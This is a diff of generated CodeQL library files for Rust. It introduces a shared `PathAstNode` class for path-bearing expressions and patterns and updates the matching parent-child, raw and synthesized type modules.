b/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll index 5470d18d35a..82c5aa4c0dd 100644 --- a/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll +++ b/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll @@ -5,8 +5,7 @@ private import internal.TupleStructPatImpl import codeql.rust.elements.Pat -import codeql.rust.elements.Path -import codeql.rust.elements.Resolvable +import codeql.rust.elements.PathAstNode /** * A tuple struct pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll new file mode 100644 index 00000000000..30ad03a4724 --- /dev/null +++ b/rust/ql/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll 
@@ -0,0 +1,19 @@ +// generated by codegen, remove this comment if you wish to edit this file +/** + * This module provides a hand-modifiable wrapper around the generated class `PathAstNode`. + * + * INTERNAL: Do not use. + */ + +private import codeql.rust.elements.internal.generated.PathAstNode + +/** + * INTERNAL: This module contains the customizable definition of `PathAstNode` and should not + * be referenced directly. + */ +module Impl { + /** + * An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). + */ + class PathAstNode extends Generated::PathAstNode { } +} diff --git a/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll index eacd777c7e2..86304cd23de 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll @@ -15,7 +15,7 @@ module Impl { // the following QLdoc is generated: if you need to edit it, do it in the schema file /** - * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + * One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. */ class Resolvable extends Generated::Resolvable { /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll index aabbb0668d8..44faa061dae 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll 
@@ -2185,45 +2185,40 @@ private module Impl { ) } - private Element getImmediateChildOfPathExprBase( - PathExprBase e, int index, string partialPredicateCall + private Element getImmediateChildOfPathAstNode( + PathAstNode e, int index, string partialPredicateCall ) { - exists(int b, int bExpr, int bResolvable, int n | + exists(int b, int bResolvable, int n, int nPath | b = 0 and - bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and bResolvable = - bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - ( - none() - or - result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bExpr, partialPredicateCall) - ) - ) - } - - private Element getImmediateChildOfPathPat(PathPat e, int index, string partialPredicateCall) { - exists(int b, int bPat, int bResolvable, int n, int nPath | - b = 0 and - bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - bResolvable = - bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + b + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and n = bResolvable and nPath = n + 1 and ( none() or - result = getImmediateChildOfPat(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) + result = getImmediateChildOfResolvable(e, index - b, partialPredicateCall) or index = n and result = e.getPath() and partialPredicateCall = "Path()" ) ) } + private Element getImmediateChildOfPathExprBase( + PathExprBase e, int index, string partialPredicateCall + ) { + exists(int b, int bExpr, int n | + b = 0 and + bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and + n = bExpr and + ( + none() + or + result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) + ) + ) + } + private Element 
getImmediateChildOfPathType(PathType e, int index, string partialPredicateCall) { exists(int b, int bTypeRef, int n, int nPath | b = 0 and @@ -2318,31 +2313,6 @@ private module Impl { ) } - private Element getImmediateChildOfRecordExpr(RecordExpr e, int index, string partialPredicateCall) { - exists(int b, int bExpr, int bResolvable, int n, int nPath, int nRecordExprFieldList | - b = 0 and - bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and - bResolvable = - bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - nPath = n + 1 and - nRecordExprFieldList = nPath + 1 and - ( - none() - or - result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bExpr, partialPredicateCall) - or - index = n and result = e.getPath() and partialPredicateCall = "Path()" - or - index = nPath and - result = e.getRecordExprFieldList() and - partialPredicateCall = "RecordExprFieldList()" - ) - ) - } - private Element getImmediateChildOfRecordFieldList( RecordFieldList e, int index, string partialPredicateCall ) { 
@@ -2362,31 +2332,6 @@ private module Impl { ) } - private Element getImmediateChildOfRecordPat(RecordPat e, int index, string partialPredicateCall) { - exists(int b, int bPat, int bResolvable, int n, int nPath, int nRecordPatFieldList | - b = 0 and - bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - bResolvable = - bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - nPath = n + 1 and - nRecordPatFieldList = nPath + 1 and - ( - none() - or - result = getImmediateChildOfPat(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) - or - index = n and result = e.getPath() and partialPredicateCall = "Path()" - or - index = nPath and - result = e.getRecordPatFieldList() and - partialPredicateCall = "RecordPatFieldList()" - ) - ) - } - private Element getImmediateChildOfRefExpr(RefExpr e, int index, string partialPredicateCall) { exists(int b, int bExpr, int n, int nAttr, int nExpr | b = 0 and 
@@ -2608,32 +2553,6 @@ private module Impl { ) } - private Element getImmediateChildOfTupleStructPat( - TupleStructPat e, int index, string partialPredicateCall - ) { - exists(int b, int bPat, int bResolvable, int n, int nField, int nPath | - b = 0 and - bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - bResolvable = - bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - nField = n + 1 + max(int i | i = -1 or exists(e.getField(i)) | i) and - nPath = nField + 1 and - ( - none() - or - result = getImmediateChildOfPat(e, index - b, partialPredicateCall) - or - result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) - or - result = e.getField(index - n) and - partialPredicateCall = "Field(" + (index - n).toString() + ")" - or - index = nField and result = e.getPath() and partialPredicateCall = "Path()" - ) - ) - } - private Element getImmediateChildOfTupleType(TupleType e, int index, string partialPredicateCall) { exists(int b, int bTypeRef, int n, int nField | b = 0 and 
@@ -3253,22 +3172,85 @@ private module Impl { } private Element getImmediateChildOfPathExpr(PathExpr e, int index, string partialPredicateCall) { - exists(int b, int bPathExprBase, int n, int nAttr, int nPath | + exists(int b, int bPathExprBase, int bPathAstNode, int n, int nAttr | b = 0 and bPathExprBase = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathExprBase(e, i, _)) | i) and - n = bPathExprBase and + bPathAstNode = + bPathExprBase + 1 + + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and nAttr = n + 1 + max(int i | i = -1 or exists(e.getAttr(i)) | i) and - nPath = nAttr + 1 and ( none() or result = getImmediateChildOfPathExprBase(e, index - b, partialPredicateCall) or + result = getImmediateChildOfPathAstNode(e, index - bPathExprBase, partialPredicateCall) + or result = e.getAttr(index - n) and partialPredicateCall = "Attr(" + (index - n).toString() + ")" + ) + ) + } + + private Element getImmediateChildOfPathPat(PathPat e, int index, string partialPredicateCall) { + exists(int b, int bPat, int bPathAstNode, int n | + b = 0 and + bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and + bPathAstNode = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and + ( + none() or - index = nAttr and result = e.getPath() and partialPredicateCall = "Path()" + result = getImmediateChildOfPat(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfPathAstNode(e, index - bPat, partialPredicateCall) + ) + ) + } + + private Element getImmediateChildOfRecordExpr(RecordExpr e, int index, string partialPredicateCall) { + exists(int b, int bExpr, int bPathAstNode, int n, int nRecordExprFieldList | + b = 0 and + bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and + bPathAstNode = + bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = 
bPathAstNode and + nRecordExprFieldList = n + 1 and + ( + none() + or + result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfPathAstNode(e, index - bExpr, partialPredicateCall) + or + index = n and + result = e.getRecordExprFieldList() and + partialPredicateCall = "RecordExprFieldList()" + ) + ) + } + + private Element getImmediateChildOfRecordPat(RecordPat e, int index, string partialPredicateCall) { + exists(int b, int bPat, int bPathAstNode, int n, int nRecordPatFieldList | + b = 0 and + bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and + bPathAstNode = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and + nRecordPatFieldList = n + 1 and + ( + none() + or + result = getImmediateChildOfPat(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfPathAstNode(e, index - bPat, partialPredicateCall) + or + index = n and + result = e.getRecordPatFieldList() and + partialPredicateCall = "RecordPatFieldList()" ) ) } 
@@ -3433,6 +3415,29 @@ private module Impl { ) } + private Element getImmediateChildOfTupleStructPat( + TupleStructPat e, int index, string partialPredicateCall + ) { + exists(int b, int bPat, int bPathAstNode, int n, int nField | + b = 0 and + bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and + bPathAstNode = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfPathAstNode(e, i, _)) | i) and + n = bPathAstNode and + nField = n + 1 + max(int i | i = -1 or exists(e.getField(i)) | i) and + ( + none() + or + result = getImmediateChildOfPat(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfPathAstNode(e, index - bPat, partialPredicateCall) + or + result = e.getField(index - n) and + partialPredicateCall = "Field(" + (index - n).toString() + ")" + ) + ) + } + private Element getImmediateChildOfTypeAlias(TypeAlias e, int index, string partialPredicateCall) { exists( int b, int bAssocItem, int bExternItem, int bItem, int n, int nAttr, int nGenericParamList, @@ -3803,8 +3808,6 @@ private module Impl { or result = getImmediateChildOfParenType(e, index, partialAccessor) or - result = getImmediateChildOfPathPat(e, index, partialAccessor) - or result = getImmediateChildOfPathType(e, index, partialAccessor) or result = getImmediateChildOfPrefixExpr(e, index, partialAccessor) @@ -3815,12 +3818,8 @@ private module Impl { or result = getImmediateChildOfRangePat(e, index, partialAccessor) or - result = getImmediateChildOfRecordExpr(e, index, partialAccessor) - or result = getImmediateChildOfRecordFieldList(e, index, partialAccessor) or - result = getImmediateChildOfRecordPat(e, index, partialAccessor) - or result = getImmediateChildOfRefExpr(e, index, partialAccessor) or result = getImmediateChildOfRefPat(e, index, partialAccessor) 
@@ -3845,8 +3844,6 @@ private module Impl { or result = getImmediateChildOfTuplePat(e, index, partialAccessor) or - result = getImmediateChildOfTupleStructPat(e, index, partialAccessor) - or result = getImmediateChildOfTupleType(e, index, partialAccessor) or result = getImmediateChildOfTypeArg(e, index, partialAccessor) @@ -3893,6 +3890,12 @@ private module Impl { or result = getImmediateChildOfPathExpr(e, index, partialAccessor) or + result = getImmediateChildOfPathPat(e, index, partialAccessor) + or + result = getImmediateChildOfRecordExpr(e, index, partialAccessor) + or + result = getImmediateChildOfRecordPat(e, index, partialAccessor) + or result = getImmediateChildOfStatic(e, index, partialAccessor) or result = getImmediateChildOfStruct(e, index, partialAccessor) @@ -3901,6 +3904,8 @@ private module Impl { or result = getImmediateChildOfTraitAlias(e, index, partialAccessor) or + result = getImmediateChildOfTupleStructPat(e, index, partialAccessor) + or result = getImmediateChildOfTypeAlias(e, index, partialAccessor) or result = getImmediateChildOfUnion(e, index, partialAccessor) diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathAstNode.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathAstNode.qll new file mode 100644 index 00000000000..a69957e7545 --- /dev/null +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathAstNode.qll 
@@ -0,0 +1,36 @@ +// generated by codegen, do not edit +/** + * This module provides the generated definition of `PathAstNode`. + * INTERNAL: Do not import directly. + */ + +private import codeql.rust.elements.internal.generated.Synth +private import codeql.rust.elements.internal.generated.Raw +import codeql.rust.elements.Path +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl + +/** + * INTERNAL: This module contains the fully generated definition of `PathAstNode` and should not + * be referenced directly. + */ +module Generated { + /** + * An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). + * INTERNAL: Do not reference the `Generated::PathAstNode` class directly. + * Use the subclass `PathAstNode`, where the following predicates are available. + */ + class PathAstNode extends Synth::TPathAstNode, ResolvableImpl::Resolvable { + /** + * Gets the path of this path ast node, if it exists. + */ + Path getPath() { + result = + Synth::convertPathFromRaw(Synth::convertPathAstNodeToRaw(this).(Raw::PathAstNode).getPath()) + } + + /** + * Holds if `getPath()` exists. + */ + final predicate hasPath() { exists(this.getPath()) } + } +} diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExpr.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExpr.qll index 562747d0f11..dbf2c9004da 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExpr.qll @@ -7,7 +7,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.Attr -import codeql.rust.elements.Path +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl import codeql.rust.elements.internal.PathExprBaseImpl::Impl as PathExprBaseImpl /** 
@@ -26,7 +26,9 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathExpr` class directly. * Use the subclass `PathExpr`, where the following predicates are available. */ - class PathExpr extends Synth::TPathExpr, PathExprBaseImpl::PathExprBase { + class PathExpr extends Synth::TPathExpr, PathExprBaseImpl::PathExprBase, + PathAstNodeImpl::PathAstNode + { override string getAPrimaryQlClass() { result = "PathExpr" } /** @@ -46,18 +48,5 @@ module Generated { * Gets the number of attrs of this path expression. */ final int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } - - /** - * Gets the path of this path expression, if it exists. - */ - Path getPath() { - result = - Synth::convertPathFromRaw(Synth::convertPathExprToRaw(this).(Raw::PathExpr).getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll index 2efc1fd3dae..cf924962dbe 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll @@ -7,7 +7,6 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.ExprImpl::Impl as ExprImpl -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `PathExprBase` and should not @@ -19,5 +18,5 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathExprBase` class directly. * Use the subclass `PathExprBase`, where the following predicates are available. */ - class PathExprBase extends Synth::TPathExprBase, ExprImpl::Expr, ResolvableImpl::Resolvable { } + class PathExprBase extends Synth::TPathExprBase, ExprImpl::Expr { } } 
diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll index e37e1e154db..3e69bb2cb32 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll @@ -7,8 +7,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.PatImpl::Impl as PatImpl -import codeql.rust.elements.Path -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl /** * INTERNAL: This module contains the fully generated definition of `PathPat` and should not @@ -26,19 +25,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathPat` class directly. * Use the subclass `PathPat`, where the following predicates are available. */ - class PathPat extends Synth::TPathPat, PatImpl::Pat, ResolvableImpl::Resolvable { + class PathPat extends Synth::TPathPat, PatImpl::Pat, PathAstNodeImpl::PathAstNode { override string getAPrimaryQlClass() { result = "PathPat" } - - /** - * Gets the path of this path pat, if it exists. - */ - Path getPath() { - result = Synth::convertPathFromRaw(Synth::convertPathPatToRaw(this).(Raw::PathPat).getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll index 368be81ad06..1a249fbcafa 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll 
@@ -803,7 +803,7 @@ module Raw { /** * INTERNAL: Do not use. - * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + * One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. */ class Resolvable extends @resolvable, AstNode { /** @@ -2302,28 +2302,20 @@ module Raw { /** * INTERNAL: Do not use. - * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. + * An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). */ - class PathExprBase extends @path_expr_base, Expr, Resolvable { } + class PathAstNode extends @path_ast_node, Resolvable { + /** + * Gets the path of this path ast node, if it exists. + */ + Path getPath() { path_ast_node_paths(this, result) } + } /** * INTERNAL: Do not use. - * A path pattern. For example: - * ```rust - * match x { - * Foo::Bar => "ok", - * _ => "fail", - * } - * ``` + * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. */ - class PathPat extends @path_pat, Pat, Resolvable { - override string toString() { result = "PathPat" } - - /** - * Gets the path of this path pat, if it exists. - */ - Path getPath() { path_pat_paths(this, result) } - } + class PathExprBase extends @path_expr_base, Expr { } /** * INTERNAL: Do not use. 
@@ -2462,32 +2454,6 @@ module Raw { Pat getStart() { range_pat_starts(this, result) } } - /** - * INTERNAL: Do not use. - * A record expression. For example: - * ```rust - * let first = Foo { a: 1, b: 2 }; - * let second = Foo { a: 2, ..first }; - * Foo { a: 1, b: 2 }[2] = 10; - * Foo { .. } = second; - * ``` - */ - class RecordExpr extends @record_expr, Expr, Resolvable { - override string toString() { result = "RecordExpr" } - - /** - * Gets the path of this record expression, if it exists. - */ - Path getPath() { record_expr_paths(this, result) } - - /** - * Gets the record expression field list of this record expression, if it exists. - */ - RecordExprFieldList getRecordExprFieldList() { - record_expr_record_expr_field_lists(this, result) - } - } - /** * INTERNAL: Do not use. * A RecordFieldList. For example: @@ -2504,30 +2470,6 @@ module Raw { RecordField getField(int index) { record_field_list_fields(this, index, result) } } - /** - * INTERNAL: Do not use. - * A record pattern. For example: - * ```rust - * match x { - * Foo { a: 1, b: 2 } => "ok", - * Foo { .. } => "fail", - * } - * ``` - */ - class RecordPat extends @record_pat, Pat, Resolvable { - override string toString() { result = "RecordPat" } - - /** - * Gets the path of this record pat, if it exists. - */ - Path getPath() { record_pat_paths(this, result) } - - /** - * Gets the record pat field list of this record pat, if it exists. - */ - RecordPatFieldList getRecordPatFieldList() { record_pat_record_pat_field_lists(this, result) } - } - /** * INTERNAL: Do not use. * A reference expression. For example: 
@@ -2801,31 +2743,6 @@ module Raw { Pat getField(int index) { tuple_pat_fields(this, index, result) } } - /** - * INTERNAL: Do not use. - * A tuple struct pattern. For example: - * ```rust - * match x { - * Tuple("a", 1, 2, 3) => "great", - * Tuple(.., 3) => "fine", - * Tuple(..) => "fail", - * }; - * ``` - */ - class TupleStructPat extends @tuple_struct_pat, Pat, Resolvable { - override string toString() { result = "TupleStructPat" } - - /** - * Gets the `index`th field of this tuple struct pat (0-based). - */ - Pat getField(int index) { tuple_struct_pat_fields(this, index, result) } - - /** - * Gets the path of this tuple struct pat, if it exists. - */ - Path getPath() { tuple_struct_pat_paths(this, result) } - } - /** * INTERNAL: Do not use. * A TupleType. For example: 
@@ -3546,18 +3463,67 @@ module Raw { * let z = ::foo; * ``` */ - class PathExpr extends @path_expr, PathExprBase { + class PathExpr extends @path_expr, PathExprBase, PathAstNode { override string toString() { result = "PathExpr" } /** * Gets the `index`th attr of this path expression (0-based). */ Attr getAttr(int index) { path_expr_attrs(this, index, result) } + } + + /** + * INTERNAL: Do not use. + * A path pattern. For example: + * ```rust + * match x { + * Foo::Bar => "ok", + * _ => "fail", + * } + * ``` + */ + class PathPat extends @path_pat, Pat, PathAstNode { + override string toString() { result = "PathPat" } + } + + /** + * INTERNAL: Do not use. + * A record expression. For example: + * ```rust + * let first = Foo { a: 1, b: 2 }; + * let second = Foo { a: 2, ..first }; + * Foo { a: 1, b: 2 }[2] = 10; + * Foo { .. } = second; + * ``` + */ + class RecordExpr extends @record_expr, Expr, PathAstNode { + override string toString() { result = "RecordExpr" } /** - * Gets the path of this path expression, if it exists. + * Gets the record expression field list of this record expression, if it exists. */ - Path getPath() { path_expr_paths(this, result) } + RecordExprFieldList getRecordExprFieldList() { + record_expr_record_expr_field_lists(this, result) + } + } + + /** + * INTERNAL: Do not use. + * A record pattern. For example: + * ```rust + * match x { + * Foo { a: 1, b: 2 } => "ok", + * Foo { .. } => "fail", + * } + * ``` + */ + class RecordPat extends @record_pat, Pat, PathAstNode { + override string toString() { result = "RecordPat" } + + /** + * Gets the record pat field list of this record pat, if it exists. + */ + RecordPatFieldList getRecordPatFieldList() { record_pat_record_pat_field_lists(this, result) } } /** 
@@ -3750,6 +3716,26 @@ module Raw { WhereClause getWhereClause() { trait_alias_where_clauses(this, result) } } + /** + * INTERNAL: Do not use. + * A tuple struct pattern. For example: + * ```rust + * match x { + * Tuple("a", 1, 2, 3) => "great", + * Tuple(.., 3) => "fine", + * Tuple(..) => "fail", + * }; + * ``` + */ + class TupleStructPat extends @tuple_struct_pat, Pat, PathAstNode { + override string toString() { result = "TupleStructPat" } + + /** + * Gets the `index`th field of this tuple struct pat (0-based). + */ + Pat getField(int index) { tuple_struct_pat_fields(this, index, result) } + } + /** * INTERNAL: Do not use. * A TypeAlias. For example: diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll index d7c6a11f21a..b6a0a2ecdd2 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll @@ -7,9 +7,8 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.ExprImpl::Impl as ExprImpl -import codeql.rust.elements.Path +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl import codeql.rust.elements.RecordExprFieldList -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `RecordExpr` and should not 
@@ -27,22 +26,9 @@ module Generated { * INTERNAL: Do not reference the `Generated::RecordExpr` class directly. * Use the subclass `RecordExpr`, where the following predicates are available. */ - class RecordExpr extends Synth::TRecordExpr, ExprImpl::Expr, ResolvableImpl::Resolvable { + class RecordExpr extends Synth::TRecordExpr, ExprImpl::Expr, PathAstNodeImpl::PathAstNode { override string getAPrimaryQlClass() { result = "RecordExpr" } - /** - * Gets the path of this record expression, if it exists. - */ - Path getPath() { - result = - Synth::convertPathFromRaw(Synth::convertRecordExprToRaw(this).(Raw::RecordExpr).getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } - /** * Gets the record expression field list of this record expression, if it exists. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll index 03f2c525180..5f0ad4f28ae 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll @@ -7,9 +7,8 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.PatImpl::Impl as PatImpl -import codeql.rust.elements.Path +import codeql.rust.elements.internal.PathAstNodeImpl::Impl as PathAstNodeImpl import codeql.rust.elements.RecordPatFieldList -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `RecordPat` and should not 
@@ -27,22 +26,9 @@ module Generated { * INTERNAL: Do not reference the `Generated::RecordPat` class directly. * Use the subclass `RecordPat`, where the following predicates are available. */ - class RecordPat extends Synth::TRecordPat, PatImpl::Pat, ResolvableImpl::Resolvable { + class RecordPat extends Synth::TRecordPat, PatImpl::Pat, PathAstNodeImpl::PathAstNode { override string getAPrimaryQlClass() { result = "RecordPat" } - /** - * Gets the path of this record pat, if it exists. - */ - Path getPath() { - result = - Synth::convertPathFromRaw(Synth::convertRecordPatToRaw(this).(Raw::RecordPat).getPath()) - } - - /** - * Holds if `getPath()` exists. - */ - final predicate hasPath() { exists(this.getPath()) } - /** * Gets the record pat field list of this record pat, if it exists. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll index ecd1e7db50a..fb0d7975cf9 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll @@ -14,7 +14,7 @@ import codeql.rust.elements.internal.AstNodeImpl::Impl as AstNodeImpl */ module Generated { /** - * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + * One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. * INTERNAL: Do not reference the `Generated::Resolvable` class directly. * Use the subclass `Resolvable`, where the following predicates are available. */ diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll index 8a236d3f322..affdd5a61b1 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Synth.qll 
@@ -713,6 +713,11 @@ module Synth { TPathPat or TRangePat or TRecordPat or TRefPat or TRestPat or TSlicePat or TTuplePat or TTupleStructPat or TWildcardPat; + /** + * INTERNAL: Do not use. + */ + class TPathAstNode = TPathExpr or TPathPat or TRecordExpr or TRecordPat or TTupleStructPat; + /** * INTERNAL: Do not use. */ @@ -721,8 +726,7 @@ module Synth { /** * INTERNAL: Do not use. */ - class TResolvable = - TMethodCallExpr or TPathExprBase or TPathPat or TRecordExpr or TRecordPat or TTupleStructPat; + class TResolvable = TMethodCallExpr or TPathAstNode; /** * INTERNAL: Do not use. @@ -2053,6 +2057,22 @@ module Synth { result = convertWildcardPatFromRaw(e) } + /** + * INTERNAL: Do not use. + * Converts a raw DB element to a synthesized `TPathAstNode`, if possible. + */ + TPathAstNode convertPathAstNodeFromRaw(Raw::Element e) { + result = convertPathExprFromRaw(e) + or + result = convertPathPatFromRaw(e) + or + result = convertRecordExprFromRaw(e) + or + result = convertRecordPatFromRaw(e) + or + result = convertTupleStructPatFromRaw(e) + } + /** * INTERNAL: Do not use. * Converts a raw DB element to a synthesized `TPathExprBase`, if possible. @@ -2070,15 +2090,7 @@ module Synth { TResolvable convertResolvableFromRaw(Raw::Element e) { result = convertMethodCallExprFromRaw(e) or - result = convertPathExprBaseFromRaw(e) - or - result = convertPathPatFromRaw(e) - or - result = convertRecordExprFromRaw(e) - or - result = convertRecordPatFromRaw(e) - or - result = convertTupleStructPatFromRaw(e) + result = convertPathAstNodeFromRaw(e) } /** 
